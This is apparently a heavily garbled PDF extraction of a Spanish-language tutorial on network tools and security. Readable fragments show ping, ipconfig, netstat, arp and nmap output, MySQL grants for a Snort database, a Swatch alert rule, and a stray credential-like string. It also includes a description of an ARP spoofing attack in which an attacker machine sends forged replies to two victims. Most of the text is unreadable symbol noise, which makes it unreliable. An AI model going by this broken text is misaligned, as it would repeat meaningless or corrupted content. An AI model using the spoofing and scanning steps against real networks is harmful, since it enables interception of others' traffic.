9ORR 0 ! '
0 0 0 0
! 5# 0 R8 9ORR8
ERRR!
7 '
? ! D

!

" 0 E= ! " IJ
!
!= >
. # 9 ! "
?4! 6
>
DBJ
. 9 ! " '+?"D/ 'DC"+?" 0

0 !
?
5(2 : ;! " 54 , 0 :
; ! . 54
! +
!
68
0,
3 '.1 &! " &!
: F:;
0
B0
3 D! D #
! ?
! D.?
!
0T
3 . ! " ! ,
! 5#
! 4
! 4
! %
.+ f 9 54 f R
! " .+

: ; 54
!
!E
3 ! . ,
! ? 7,+ .+ 0 !
<
5 &!
1
&! 4 ?4
:;
: 2; ! . &
! . :R; &
IJ ! "
!
+ *
. : ;
9Q ! " ! 5
( ?4
0 ! "
9Q 9 9
! 4 #
( !
&
4 * : ; !
" .+ & 3.
!
69
'# ?4V,

"
2 ?4V, !
*&
(
2 ?4V,! . 3+.
! ' 0 ,
,! " # >
( `,cica
. & 0 ! 3
, , ! 4
!
&
% & 2 ?4V,!
& " ,4$ ! '
= &!
7
"
#! "
> I J
! " >
à]c
4>H (]!!
`!!a
'$<'5? C '$<'5?
% 7 9QF.F9AAQ E>LS$F"3?
>
C 4!
5& 7 $ C 4
,+?"D+"?> (]!
" & : ; !
4>H ]!!
`!!a
? . 9S 9AAQ 9R>9=5$F"3?' ER RA>LR>9B
O@9 T .$465- % R!9Q R!9A R!=9
' + . ? 4 %
C//3),+ 3 C2%+- Q!+?= 2!!
T5?T ?9!?-5O
1"%3". . $ "3?=>RB!+?L `9AA!AE!EO!9B=a
.$,?1 % . ,+"!+?E `9AA!AE!EL!9EAa
..?"$. $ $5,% =E!/5R ? 65- 4
\34%\ .$46-9_/5R ? 65- 4
70
" & ! 3

!

#
! %
,!
" : b
;>
`F ba `F ba `F2 ba `F ba j,cick
" &>
5 ??% 0
& : f ER;
5- 0 '3 ( : f E;
5G
:f O;
5& : f EELEL;
% '3
! ' #
??% :?F?F%; 9! 9
& 8
& ,4$ :?"$;
! . # E & '3 ??% =
# ?"$! " 0
! 3
# & ,4$ 3
! "
& ! 1
,
!
/ 7?
!
!
7? :7 ? F ? 5;! " ,
!
? 7? 0 ! 7?
! " 7?

! % 7?
7?
" 7? >
`,cica
71
1 7? !
, !
)!
" 7? ?4V,
! " ,

7?! " !
! "
7?
! 4 * :2;
2
!
.
: ! !& 4 ! ! $ !
! '+,- !; &
!
!) +

5 & 7? #>
+

5.4,,! % # !!
+
@. # 5.4,,! 4 &
# 2
:) ) )2 )( !;!
" & B !
" #

* !
!
4 7? 7?! "
#
' : ; 32 : ; !
1 # >
D7 AB
).c7?
7?)
47?
).c5

72
" > ,4$

,4$ :, 4 $ ;
! % ,4$ ,
,! " &
:+>
!;
&
" ) * ! :( , C;
,
! 4 . / &UEV
, 4!
%
0 !

!
% ) >
Uso: ping [-t] [-a] [-n cantidad] [-l tamao] [-f] [-i TTL] [-v TOS]
[-r cantidad] [-s cantidad] [[-j lista de host] | [-k lista de host]]
[-w Tiempo de espera agotado] lista de destino
Opciones:
-t
-a
-n cantidad
-l tamao
-f
-i TTL
-v TOS
-r cantidad
-s cantidad
-j lista de hosts
-k lista de hosts
-w tiempo
Solicita eco al host hasta ser interrumpido.

Para ver estadsticas y continuar: presione Ctrl-Inter.
Para interrumpir: presione Ctrl-C.
Resuelve direcciones a nombres de host.
Cantidad de solicitudes de eco a enviar.
Tamao del bfer de envos.
No fragmentar el paquete.
Tiempo de vida.
Tipo de servicio.
Registrar la ruta para esta cantidad de saltos.
Registrar horarios para esta cantidad de saltos.
Ruta origen variable en la lista de host.
Ruta origen estricta en la lista de host.
Tiempo de espera agotado de respuesta en milisegundos.
C:\ping 127.0.0.1
Haciendo ping a 127.0.0.11 con 32 bytes de datos:
Respuesta desde 127.0.0.1: bytes=32 tiempo<10ms TDV=128 TDV (Tiempo de Vida = TTL)
Estadsticas de ping para 127.0.0.1:
Paquetes: enviados = 4, Recibidos = 4, perdidos = 0 (0% loss),
Tiempos aproximados de recorrido redondo en milisegundos:
mnimo = 0ms, mximo = 0ms, promedio = 0ms
73
4 5 !

" % >
~$ ping -h
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.100 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.102 ms
--- 127.0.0.1 ping statistics --2 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 0.097/0.101/0.103/0.006 ms
<
" ( ,
! & ) >
4>lH F QOO9R !
" ! " 0 * &
!
74
" '3

'3 :' 3 ; 3 '
,! 5 ?4 ?4V, '3
! 3
! '3 ?4 &! "
'3 3+. , : ;
?7? :? 7 ? ;! ? !
" '3 ?4 +/

! .
& ?4
!
'3
! " %5+
,
!
" '3
'3 ! . &
!
D D
" '3 , =
: %2 5 $!; " &
?4 #
# ! . =L :;
# = E! 4 '3
! .
: # ;!
% [,
D5D A $ !
D = #
! & ?4!
M ?4 '3 N %
! $ ! 4
!
75
%
4 ?4V,! " QE
,
# !
6 0>
192.168.0.1:80
" ,! 3 :>; PR 0
! D #
F #
!
4 QOOEQ
! ? 0
& >
Puerto (123, escucha, programa)

% 0 9=E
& ! ? & >
Puerto (19344, habla, host:123)

" > 0 9AELL *
: ; 0 9=E!
% 9R=L

! "
!
& 0 BR 1??
=9 7?! " &
! " BR 1?? =9 7?
I&J!
4 0
!
5 9R=L LA9O9 0 &
! %
2 :$ %
.3 ;
" QOOEQ
! .
!

!
4
!
76
% ! '
# ! . 0 ! "
#
!

! 5 &
! " 0

!
0

" &
!
& ! %
! "
!
. # !
% !
*=> "
=> " ! '
0! 5# * !
=>" 0 !

" & :
; ! "
& ! +
9R=L! 5 0
!
!
% >
*=>"
=>" !
% 9 9R=L ! ?
# !
% , 5 +
5 :,5+5;9S 222!!! 5# & 0 ==
..18 =E =E8 =O 9EO 9EA !
17(Agencia de Asignacin de Nmeros Internet) Antiguo registro central de diversos parmetros de los protocolos Internet, tales como
puertos, nmeros de protocolo y empresa, opciones, cdigos y tipos. Los valores asignados aparecen en el documento Assigned Numbers
[STD2]. Fue sustituido en 1998 por ICANN.
77
?
0 =9
7?!
. : ;
&
>
^_ F 9ES =O
Orianna [127.0.0.1] 137 (netbios-ns) : Connection refused
Orianna [127.0.0.1] 25 (smtp) open
5 +4
0 : & 9ES =O;!
" :` a; , ! "
! % 5

:
# 5
;

9B 0 !
! % +4 )!
" ,
! ?
0 +4!
' 9R=O LA9O9
,5+5
! +

!
" QOOEQ #
! .

! 3 # IJ
: 2 7? ;
: ,
#; #
!
" )+? % 0
,5+5 0 D74 E=E=!
" )2
4>m2mE=mmm
18Localhost es lo mismo que 127.0.0.1, es decir, es nuestra propia mquina. Tambin se conoce como direccin de retrociclo (Loopback).
Se utliliza para la deteccin de fallas.
78
" % !
~$ tail /etc/services
binkp
asp
csync2
dircproxy
tfido
fido
24554/tcp
27374/tcp
30865/tcp
57000/tcp
60177/tcp
60179/tcp
# binkp fidonet protocol

# Address Search Protocol
# cluster synchronization tool
# Detachable IRC Proxy
# fidonet EMSI over telnet
# fidonet EMSI over TCP
.
! ?
0 ,5+5!
^_ VV
ftp
fsp
ssh
ssh
telnet
smtp
time
time
rlp
nameserver
whois
21/tcp
21/udp
22/tcp
22/udp
23/tcp
25/tcp
37/tcp
37/udp
39/udp
42/tcp
43/tcp
# SSH Remote Login Protocol

mail
timserver
timserver
resource
name
nicname
# resource location
# IEN 116
5# >VV222!!VVF!
'
!
" ! D #

0 ! "
# ! 1
# !
/ BR 1??
! " D74 E=E=
1?? 0 BR BAOR
!
79
. 3+.

%
! " 0 5.4,,
]!! .
5.4,, ! #
. + 3 : 3+.;
" 3+. &
! " 3+.
,
!
, 2
# :
*;
! " # '3 3+.
,
! 4 , ?4
'3!
% , 0 E= #
,! % 3+. , :,;
!! %
8 !
!
5 , 3+. ! "
, ! 3+.
!
4 )2 V 3+.>
ipconfig /all
Configuracin IP de Windows
Nombre del host. . . . . . . . : O8Z0E9
Servidores DNS . . . . . . . . : [Si hay conexin a Internet debe poner algo]
Tipo de nodo . . . . . . . . . : Difusin
Id. de mbito NetBIOS. . . . . :
Enrutamiento IP habilitado. .: No
WINS Proxy habilitado. . . . . : No
Resolucin NetBIOS usa DNS . . : No
" # ! "
& ! " % 3+. ! 4
>
cat /etc/resolv.conf
# generated by NetworkManager, do not edit!
search gateway.2wire.net
nameserver 192.168.1.254
80
" 0 3+.
,
!
" ) V
0 ! ? N V
>
ipconfig ?
Configuracin IP de Windows
Opciones de lnea de comandos:
/All - Muestra informacin detallada.
/Batch [archivo] - Escribe en el archivo o . /WINIPCFG.OUT
/renew_all - Renueva todos los adaptadores.
/release_all - Libera todos los adaptadores.
/renew N - Renueva el adaptador N.
/release N - Libera el adaptador N.
" # C D
& & >
, V H4>l!
4 V
! "
!
% >
www.cualquierdominio.com
Nombre de registro...:
www.cualquierdominio.com
Tipo de registro...:5
Tiempo de vida...:852
Longitud de datos...:4
Seccin.......................:Answer
Registro CNAME.....:
Dns1.dominio.com
Nombre de registro..._
Dns1.dominio.com
Tipo de registro...:1
Tiempo de vida...:852
Longitud de datos...:4
Seccin.......................:Answer
Registro CNAME.....:
Un registro (Host)..: 123.123.123.123
5# ! 4+5$" I J
, 3+.!
>
, V
4 !
81
. 4F. $ ?4

% # F ?4 '3
# ! 1
!
3 F

!
0
,=.>
,,.
5
.
, "
/ + 7
0

.
<
"

/( "
"
/ !!!
0
!
)F7?
7?
!
47?
! , "
3 /
2> 222!!! " 9R=L
ORRR! Z # & OE
:3; 4 :3+.;! " 3+.
# , !
$ , 222!!
&
123.123.123.123.TUCOMPU:5000-><-DNS:53
' 1?? &
QRRR 1??!
TUCOMPU:6000 123.123.123.123:80
4 : ; 2 1?$%
!
&
I& J!
TUCOMPU:60001 -><- 123.123.123.123:80 (para imgen 1)
TUCOMPU:60002 -><- 123.123.123.123:80 (para imgen 2)
TUCOMPU:60003 -><- 123.123.123.123:80 (para HTML)
" : 2 1??;
! Z
,!
82
& ! 4
F/( "F IJ IJ
: LRRR; 99R :E9A;
>
TUCOMPU:4000 -><- 123.123.123.123:110
! 5
# ! "
`,> ,>a
0 , !
& #
) & C! 5 )
2
! C 2!
99R =O
2 &
!
19Post Office Protocol -- POP (Protocolo de Oficina de Correos) Protocolo diseado para permitir a sistemas de usuario individual leer
correo electrnico almacenado en un servidor. La Versin 3, la ms reciente y ms utilizada, llamada POP3, est definida en RFC 1725. No
confundir con PoP (Con 'o' minscula).
83
$54 5D
< =< >
5 4 , # ,
9A=!9QB!R!9=O
! 5# & $54 :4 5 $;!
'<
D %5+ ,V"
! ' ,> , 0
! % & ! 6 >

& 0 0
0 & '< ! % $54
& #! 5 $54
& ! % $54
LB ! $54 & #
>
C:\ Ipconfig /all

1 Ethernet adaptador:
Descripcin . . . . . . . . . : PPP Adapter.
Direccin fsica . . . . . . . : 44-45-53-54-00-00 <--Esta es la direccin MAC
DHCP habilitado. . . . . . . . : S
Direccin IP . . . . . . . . . : 0.0.0.0
Mscara de subred. . . . . . . : 0.0.0.0
Puerta de enlace predeterminada:
Servidor DHCP. . . . . . . . . : 255.255.255.255
" -->-->-->-->-->--! 3 - 0 !
% =L 2 =L 0
! " = &
$54!
' $54 # 0
! . & ! "
:; 9ORR ! 4
$54 ! % ,
: $54; 2!
B= B >
" 5D D 3 :%5+;! +
,!
, " & ! ,
! " &
! " "
* # :2;! " 2

0 $54!
84
4 " ,! .
" $54
"! % 0
, ! 3 #
" $54 ,!
" & 5D!
< & B4 5D 5D :5D ;! .
#> 4
%5+
I;2 #! 4 4 4 4<1 3/"J! % 4
, D 5D :5D ; $54
,F$54
0 5D :;
5D! 4
5D 5D ,V$54! % #
5D 5D
! %
!
" ,
# #
,! #
!
? ) % # 5D
! 5D 5D (
! %
! 5# 5D
5D!
. # 3/. % :%
% PVP PFP;!
4>lH VN ^_ F %
5 5D!
arp [-vn] [<HW>] [-i <if>] [-a] [<hostname>]
<-Muestra la cach ARP
arp [-v] [-i <if>] -d <host> [pub]
<-Borra una entrada ARP
arp [-vnD] [<HW>] [-i <if>] -f [<filename>]
<-Agrega una entrada desde un archivo
arp [-v] [<HW>] [-i <if>] -s <host> <hwaddr> [temp]
<-Agrega una entrada
arp [-v] [<HW>] [-i <if>] -Ds <host> <if> [netmask <nm>] pub <-''-a
-s, --Configura
-d, --Borra
-v, --verboso
-n, --numrico
-i, --dispositivo
-D, --uso-dispositivo
-A, -p, --protocolo
-f, --archivo
Muestra (todos) los hosts en un estilo alternativo (BSD)

Configura una nueva entrada ARP
Borra una entrada especificada
Verbosidad
No resuelve los nombres
Especifica la interfaz de red (ejemplo: eth0)
Lee <hwaddr> de un dispositivo dado
Especifica una familia de protocolos
Lee nuevas entradas de un archivo o desde /etc/ethers
85
^_ F
" 5 ,F$54
! 4 ,
$54 &>
^_ U 9A=!9QB!R!9 R9>R9>R9>R9>R9>R9
1

!
'<
M5 # $54 4N 4 ! . #
& 0
! + $54
$54 #
*! 6 &>
PC-A Primera vctima
MAC 01:01:01:01:01:01
IP 192.168.0.1
PC-B Segunda vctima

MAC 02:02:02:02:02:02
, 9A=!9QB!R!=
PC-C Atacante
MAC 03:03:03:03:03:03
, 9A=!9QB!R!E
% 4F4 ! 3 # # 5D 4F5 4F

! 5 4F5 "
4F
5D! 4 4F5 #
4F
$54 !
" # 5D .!
86
5D .
" 5D =R
!
4 5D ,
"! " ,! 4

#!
4 # ! .
3. 5D 2
!
2 ! %
! . !

B
" 5D 5D! 4 #
5D #
5 &
! 4
5 # ! 5
5D 5D
" 5D : 5D ;!
6 > # & :
5D ; 4F5
4F
>
PC-A: arp-reply informando que 192.168.0.2 tiene la direccin MAC 03:03:03:03:03:03
PC-A: arp-reply informando que 192.168.0.1 tiene la direccin MAC 03:03:03:03:03:03
3 5D! 5 #
! 5 0 *
!
#>
Paquetes procedentes de HOST-A > Reenviar a 02:02:02:02:02:02
Paquetes procedentes de HOST-B > Reenviar a 01:01:01:01:01:01
5#
! .
* ! "
!
B5&7=077B 0 >
" # 2 ! "
!
% 2 IJ 2 :
,F$54F.2;! 4 #
2 IJ !
20Pocedimiento que cambia la fuente de origen de un conjunto de datos en una red, adoptando otra identidad de remitente para engaar a
un cortafuegos.
87
% 2 $54
! " $54 &! %
2 $54
!
% &
$54 ! "
2 ! "
! % #
!
"
:FFF; ! 4
* 2 # !
FFF 5D
: ;
:2; & ! " #
! 6
>
% 5 # :3 C2;

! %
#
% 3
#!
88
4 FFF :$,$;
& ! 5#
!
%
! % : -

9
= ;
- 5D
9
=!
9 ,
= $54 -!
= ,
9 $54 -!
? ,
9
= - !
"
2! ? ,
& $,$ %5+!
/ $54 :$54 ;! 5
5D 2 V$54
2 ! % # 0
2 & !
,
" C
0 & $54>
5 5F " !
&&7
4 # 5 0
!
B
>VV2!!V^VV
5D #
! 5D! 4 #
, $54 !
&
>VV!!
" 2 !
> , $54 F! 5
!
" " %5+!
0 # 5D D"<'".? : 5D; , ,
& ! / 5D D"%
!
.
:=OO!=OO!R!R;
=OO=OOfQOR=O 9
! "
! " ( &! ?
0
!
89
" & > , $54 5D 5D 0! 5#
>
9!
=!
E!
L!
,

" ..1
D *
$

5D %5+ #
5D ! 4
:; 5D! 4
$,$ %5+ 2
!
&
3. ! " 5D
$54 ! % 5D
!
5D
! ? # %5+
! 5 ) 5D
$54
!
7
+ 5D ! 3 0
5D ! 3 5D
5D !
% KK 5D
$54!
' 74 52
5D ! 4 ,V$54
! 4 $54 , :
F; # !
F & $54
52! " 314 F
# !
" :2;
* $54! "
! '
! . *#
!
? # $54
C$
>VV222!L!VV9ESL=EOBVARLVC$54c.!
90
"
% : ;

! 5 ( (
: ;!
% #
IJ
& ! %
!
. :
;
! 4
! %

! " ?4
'3 ! " !
4 #

! Z * !
4 *# T
! % 2 5/% . " A!R
$ ! "
!
6
!

" )2
% + %! 3
!
4>lH F
" %
~$ netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address
Foreign Address
State
tcp
0
0
*:nfs
*:*
LISTEN
tcp
0
0
*:netbios-ssn
*:*
LISTEN
tcp
0
0
Orianna:ipp
*:*
LISTEN
tcp
0
0
*:smtp
*:*
LISTEN
tcp
0
0
*:microsoft-ds
*:*
LISTEN
udp
0
0
*:nfs
*:*
udp
0
0
*:netbios-ns
*:*
91
"
! " ?4 '3! "
:;

! " &
!
/ % # #
!>
~$ ss -a
State
Recv-Q
LISTEN
0
LISTEN
0
LISTEN
0
LISTEN
0
LISTEN
0
Send-Q
0
0
0
0
0
Local Address:Port
*:nfs
*:netbios-ssn
127.0.0.1:ipp
*:smtp
*:microsoft-ds

"
>

% :; ! 5

! 4
& : & 9R=L; !
/ : ;
! " !
% :; #
!
? :;
! " & ! "

0 !
/ 4c)
!
?c)
! +
.!
+
*
!
^_ F E
+ ! . 4@4 !
" '3 + '3
!
4 I3 J
usuario:0
!
92
F5
Z & +
>VV222!2!V
-F+ 0 & ! $
?4 '3
!
? + -F+
+!
&
" : # $ D;
>VV!VV
/ % )2 " :222!!;
! " +
% )2
! &
!
' & ! 5#
0T # ?4 :? 4 ;!
" ?4 #
! .
0TW ? ! %
0
# D.?

! 1
!
D ( ! "
!
+
9 LA9O9 F F
! . ,
& ! "
!
)0
/ & + ! .

: *;! Z
! . ,
>
F3 *9` *= *E /!!! *+a 9=E!9=E!9=E!9=E
* , / ! 9=E!9=E!9=E!9=E
! %
! " #
# 9R 9O ,!
93
,
5 % >
F !!! `>a 9=E!9=E!9=E!9=E
4 1 ?
& :9=E!9=E!9=E!9=E;
:!!!; >!

! "
!!! !
4 5 + ! 5
AAe
) % !
"&>
nmap -O 123.123.123.123
Starting nmap V2.53 by Fiodor@insecure.org
(www.insecure.org/nmap/)
Insufficient response for TCP sequencing (1), OS detection will be MUCH less reliable
Interesting ports on 123.123.123.123 (123.123.123.123):
The 1510 ports scanned but not shown below are in state closed
Port
21/tcp
80/tcp
139/tcp
443/tcp
State
open
open
open
open
Service
ftp
http
netbios-ssn
https
Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT4 SP3, Microsoft NT 4.0 Server SP5 + 2047
Hotfixes.
4 9EA +
)2
!
% ! .

!
+ ,
! "
!
" ) %
! >
4>mHm9H F2c
94
"
! . &
-F+ : (;
! ! "
!
)0
%
! .
! " &
!
% ! .
2 # BR8 7? =9 ! "
#
!
1
& :
;
!
" ! "
-F+ ! 1
D 1
! " #
!
! ' & 2

!
@ .
4 I J
! ' (

0 !
. &
0
,! +
! .
2 ! .

#
!
" !
+ &
, ! 3

! % #
! < 0 & &
,! , # #
# # !
95
" 2
, F 3.% *# ! '
>VV!!!V!! " .
/ 4
!
')0 6
+
!
" ,

! "

! %
# ,3. :, 3 .; . 3 ,
#!
)
" 4 *! "
! .
! "
! . #

, !
#! Z
& ! " ,
:( ; &
!
3
! .
& IJ! % # &
! Z
& ! . ! 3
# !
&
! + ! 5 #

! , 3+.
2!
)2!
!>
>VV(!V'+,-V,3.VF9!9!
@*
" )2! 5

( ! . &
! ' & &
, !
96
. 3 ,

? . /
! "
!
" *#
? .
! %
! 5
" 3 :! =
;!
5
! . 9ABR T ! 5
!
! 4
#
# ! " #
,3. . 3 , F, 3 .!
% ,3.

! 5 *
!
,3.
! "
! 4
# !
.
! %
& !
! E0
% ,3. >
!
< " ,3. *
! <
! " 0
. : ;! 3
!
' % ,3. # :
; #
!
B& " &
! ? #

& !
97
' & # 'D% =9! . 2
222!!VV # 2
!
. # ,3. IC"? VV1??V9!9J
#
!
!
& ! " &
5.4,, # 0! '
0
&! "
,
! # & ] :;
eLR8 e=R8 I!J e=8 eQ9 eQ=! 4

C"? VV1??V9!9

C"? VeQ9V1??V9!9
" ,,. # BERQRQLR
& I5",/'J!
7 E0
' ,3.
! "

! " ,E0
#!
% 1 ,3.
& ! 3
0-
. + )2 &G
0. , 0 !
% && E0
:; !
. +,3. +2( ,3.
! ,
! ,
!
' B !B 0
:222!!; ,3.
& !
21 Uniform Resource Locator (Localizador Uniforme de Recursos) Sistema unificado de identificacin de recursos en la red. Las
direcciones se componen de protocolo, FQDN y direccin local del documento dentro del servidor. Este tipo de direcciones permite
identificar objetos WWW, Gopher, FTP, News. Ejemplos de URL son: <http://www.anaya.es> o <ftp://ftp.ati.>
98

E0
+ ,3. # # !
&
! + IJ!
" ,3.
!
& ,3.
! " : 2;
IJ #
,3. ! " *
!
' &
,3.
:3 ;

!
% ,3. ! 5

:..1 ..%==; & !
? ?4! " =RR=
& 3 . # ,3. !
% *
! " ,3.
!
" > >VV222!(!V^VV
1
,3.!
9
? ) %
# ! 3
& .2 % " )2! .2
>VV2!! & >
2 F VV2 F VVV
! "
>
watchfor /IDS/
echo bold
mail
addresses=admin,subject=Alerta Snort!
exec echo $0 >> /var/log/IDS-scans
22SSL Secure Socket Layer (Capa de Conexin Segura) Protocolo creado por Netscape con el fin de posibiltar la transmisin cifrada y
segura de informacin a travs de la red.
99
.2 ,3. ! . :;
& ! " #
2
22E05 !
" 22 &
>VV222!(!Vc2!N."..,/+f !
E0) @97=@77>
% ,3. 0 :
/2;! 1
:(;

& #! 0
+/ :+ /;
& ! " &
=E :; & & ! "
BQ +/ eAR
IeARJ & ! ,3.
!
"

! " E
# > % +/

! "
! 0
: ; ! 4

!
5 ,3.
* ! '

&
! : ;
! % & $.
!
0B
. ! % &
! . $. ! 5
& !
. .+/D? 9A=!9QB!R!9
$.<% 9A=!9QB!R!= & !
5 # )
: ;
! . )4 .
! . >VV2!!!
23Lenguaje de programacin de bajo nivel que se usa para escribir programas pequeos includos los virus. En los das tempranos, el
lenguaje assembler se us siempre. Hoy solo se usa cuando la velocidad es esencial o cuando la tarea no es posible en el lenguaje de Alto
nivel que nosotros estamos usando. Se dice que es de bajo de nivel ya que estn ms cerca al lenguaje mquina. Lo de nivel no tiene el
significado de "calidad" como alguien podra pensar. Los archivos llevan extensin .ASM
100
4 . 7D
!
$. .<% . ! % & !
# % ! 4>lll

! 1 '
)!
% .
D'%"c5?1
I!!!VJ ! "
&
D'%"c5?1 4>ll
% 1/$"c+"? ! .
>
192.168.0.1/32
. 9A=!9QB!R! #>
1/$"c+"? 9A=!9QB!RV=L
% "-?"D+5%c+"? IJ! %
& IJ IJ!
7 <)-
+ & ! , $ )2 !
. EERQ!
& 2! I.
.J &
4>lH
4 4>lll !
%
! * >
mysql>update mysql.user set password=PASSWORD('clave')
where user='root';
mysql> FLUSH PRIVILEGES;
5 $.<%
.! ' & # >
H 8
101
& &
& # >
4>l F3 G4>lllc

!
3 2! * I3J
!
! 6
4>lll >
mysql> grant insert, select update,create,delete on snort.* to snortusr@192.168.0.2 identified by 'clave';
mysql>FLUSH PRIVILEGES;
5# .+/D?
*
! % * ! #
:; !
.
!
4>llH F3 F 9A=!9QB!R!= F F
' >
H \ !8
" # : ;! .
! .

! + .
& !
>
4>llH F F
' "$.F$. $ )2! "

>VVF!VV
E '
% % .
! .
$.!
!V F2Ff VV
102
% 3 VVV! # (c2(
& !
>
_ F3 F F V!
4 5 3 :=L; 5
! 4 5
! 4 %
0 0 ! + F F3!
?
* !
_ ( VVV
24Daemon (o Demonio) Abreviacin de las palabras inglesas Disk and execution monitor (Monitor de Disco y Ejecucin). Los Demonios
estn presentes en todos los sistemas UNIX y desempean tareas que no requieren intervencin del usuario, es decir, son independientes.
Las personas ms familiarizadas con Windows pudieran comparar a los demonios y las tareas de que son responsables con los servicios.
Un ejemplo de demonio presente en los sistemas UNIX es el LPD (Line Printer Daemon).
103
, % .

4 * ! . #

# 2 ! "
# &
!
% , & #
2 : ; ! 4
# ! %
" ,
: ,; 2
" !
1 2
!
JG)
' 2
! .
! "
/.,!
' 2
:%5+;
, :+5?> +2( 5 ?;! "
, $
: ,; ,
0 , 0 , !
% , 2 : ; 9A=!9QB!9!9 9A=!9QB!R!9
9=S!!! 9R!!! 9S=!!! 9A=!!!
! " 2
= !
" 53.% 2
, =
= +5?!
6 ! "
:2;! 4
:;! '
: & , +
,/. 5?(;!
! "
2
& !
% " &
! " #
! .
!
104
" # !
" # > *

: & ;
: ( ;!
5 # ,3. , 3 .
:. 3 ,;
!
"
I. J
7! " 8
! " &
: # ; "
#
& ! % # : ;!

#
! %
# !
& - 077
% 2
! "
! 0

!
! % # *
*
!
" 0 "! %
0

:+,4 & ";

! " !
% 4
&
& "
4 !
" # ,
& ! % & 4
:
; & +,4 ?/3/.
, !

&
!
3 & "
" ! .
&
2 !
105
% >

$&& #'$GERRY!g1e2r3r4y5
g1e2r3r4y5
cd /software
" JBBT 2 38KL)M
% : 2
; 2
!
& !
% 0 1
! :2;

! M I JN 6 #
$54 5D !
5
! " 4 ! 4

"! " " &
! " ! .
! ? &
!
" ! ' :;
! '
# !

& ! %
&
! " #
! 5
!
" ?4V,! .

! 3 & ! "
$54!
& %
!
" 22 : %;
& !
" % &
& >
_ R GF
_ R U GF
106
#

F
eth0
Link encap:Ethernet HWaddr 00:0D:87:07:6D:D0

UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:20 Base address:0xd400
+ & & !
>
_
>
b VVV
# # >
/kernel: fxp0: promiscuos mode enabled
Sep 26 15:53:00 XX kernel: [27490.081970] device eth0 entered promiscuous mode
" % ' 7
! 5
&
! .' 3/! " KK 2 :
;! . * :
\\\\;! .
>
F
* ! " 7 %
* !
! D077
' : # ;! 4 ,
! + 0
! 5 &
! % &
!
%
! . #

! 5 2
& ! %
!
! %

! " !
107
# #
:
0 ; ) .& &
D! "
# >VV2!!! " # & &
% #!
3 ! % >
./ : ;8 '
! ,
2 2 2!
077
1
! %
./. %! " ?
! ?

5
! ' "
) % ! . 222!!!
" #

F2
& % *!
? J G* 0&)4 " 0 (
C ) D! " 0
! )
!
" % 222!!! "
#! 1 +
!
77
" * , ! .
ERR ? 7?! "
&!
J
" )2
& ) "! .
# 2
! %
! 4
& >
4>lH
108
.
G".4H 0! 5
! "
! 4
!
&
" # C :C D
" ; : + + ;! " ) %! .
# ! .
* 7? #
>
K'."Di5..K =9
" )
% 8
& /!

" % #
! %+! %+ &
! .

! "

!
+
"
! 3
0 ! 5 %
'
)2! 4 " & 72
)2! .
222!!
" # ! 4 4?D%@
! . " +2( + D
, ,! "
: ;
!
" " # >
& 0
"!
+ !
!
109
1G
" 462
! "
0
!
' &
462
, !
462 # ,! .
, $54!
3+.! " *
!
462 D . ?4
1"- :; 5.4,, #
: ?4 +
;! "
./
!
% & !
, !
!
. ! 462
> 5D
45.? 314 3+. ,4$ ,4< .$? '3
?"%+"? ?4 !
462
222!!V2VV
110
% . 3
1 # &
!
" & 3!
& '
3 & % #
! % :
0 ; > *
!
= 2 !

.
& *#
! 3

( ! 1
&! + & !
E '
%
! ? 3
. #>
&&7 D : ;
5D! " 2!
&77 V 3+. %5+! " 0

FFF!
77" * & 7? ? .$? 1?? / ++? ,$5 .+$
%35 D D, /.7 ? $.F415 +7. 6DD V+,. ./4. -99 46. ,D4 5,$ ,4< +
.<% $ $( 4 ,45 . 52 +5, . $ .$
/
.<%\+ . .<% $!
77 +7. !
7 , $54 :
2 ; !
7 $ & .$? /
( # !
7D & $& 5/% ,4< =RRR ,D4 $.+
$ $!
&*$ ?4 :0
# :EF2 (; ?4
;!
& 3 ?4 %5+ IJ!
7D 'D% 1??
2 !
G&)"# 'D%
!
+ ..1 2
!
G 1??V1??. #
..%!
111
' # &

!
E E '
#! % & &
! !
& &
5R4M48 :>VV222!!;

534R484 :>VV222!(!V&V;

5343N :>VV222!(!V&V;

5 5K4343O :>VV222!!;
&00 :>VV222!..%!;
77584KL :>VV222!(!V^VV;
" 222!(!V^VV!
& I34L.+- !J
% 0
!
.
7
>VV222! !VVV
" & 4/ 2!
3 # ! 5
>
44/
>
^_ F F=!E!!
" 5/
: & 77584K44/ 77584K;!

!
& ' ' 3& 0
!

7! 5 >
^_!V
(
^_ (

#>
^_ (
112
3
42 7 >
^_ !V FF9BO
" 0
# !
. #
,! 222!! 222!&!
!
/
'
! . !!
! ' ! "
, 2 #
!

>
^_
"
! & >
^_ U,
9
" R 9 ! . &
7@3 ! . &
, 2

# !
? # ! "
!
"
!
67 B

5 %5+
%5+! " &
% /
.3 7
.3 .! 5 )+?
& !
" >
3! % > ! ?
!
8! % 2 :;> "
2
!
113
" 2 # &
! . * :
;!
2
! % # 2 I J

! + *
! >
' 7 :; $54
2! . 2

! . 2 I J I
J 0 %5+! 5
# #
!
+> % # 2 $54
& ! " !
K! % 2 #
& 2
# 2V!
%5+
! 5# ! +
&
! . #>
3 %5+
& $F,F
?F$ : %5+;! 5D
$F,F?F$ 2! 3
%5+ ! 5
# 2
& %5+!
-D7 S
' %5+

!
3 &
!
- & <) +

' # 7 77
*! 5
!
# '+,-!
!
- & DB
% 7 *
1?? 'D% ! 2
'D%
!
114
- <55+5<

?
! 1 2
2
8
! $FFF$ #
& &
!
D $FFF$ *

! 3 V
! " T & $
! ' T
&! $ & T
# !
"
# 0! % # 0
0 8
! 4 ..1 0! %
$FFF$ &
0 :
!; . &
! 50
0 &
! " # /
! + ! %
*
!
7 -
"& $FFF$ :$,?$; &
! "
: 2; >
